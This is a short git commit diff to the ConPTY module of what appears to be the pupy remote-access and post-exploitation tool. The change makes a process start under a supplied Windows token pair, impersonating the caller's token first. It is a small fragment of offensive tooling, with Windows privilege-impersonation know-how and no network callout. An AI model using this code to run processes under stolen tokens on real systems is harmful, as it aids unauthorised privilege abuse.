ConPTY: handle passed impersonation token pair correctly

2019-11-10 09:17:35 +02:00 · 2019-11-10 09:17:35 +02:00 · 20e2c6baf0
parent b75d7fe6fd
commit 20e2c6baf0
1 changed files with 7 additions and 1 deletions
--- a/pupy/packages/windows/all/conpty.py
+++ b/pupy/packages/windows/all/conpty.py
@ -18,6 +18,7 @@ from pupwinutils.security import (
    ReadFile, WriteFile,
    start_proc_with_token, kernel32,
    StartupInfoAttribute, GetExitCodeProcess,
+    impersonate_token,
    PROC_THREAD_ATTRIBUTE_PSEUDOCONSOLE, S_OK,
    INVALID_HANDLE_VALUE, WAIT_OBJECT_0, WAIT_TIMEOUT,
    STILL_ACTIVE, INVALID_HANDLE
@ -129,8 +130,13 @@ class ConPTY(object):
        self._lpInfo = None
        self._create_pty(pty_size)

+        if htoken:
+            caller_thread_htoken, requested_htoken = htoken
+            impersonate_token(caller_thread_htoken)
+            CloseHandle(caller_thread_htoken)
+
        self._lpInfo = start_proc_with_token(
-            cmdline, htoken,
+            cmdline, requested_htoken,
            lpInfo=True,
            # Important - will not work otherwise
            hidden=False,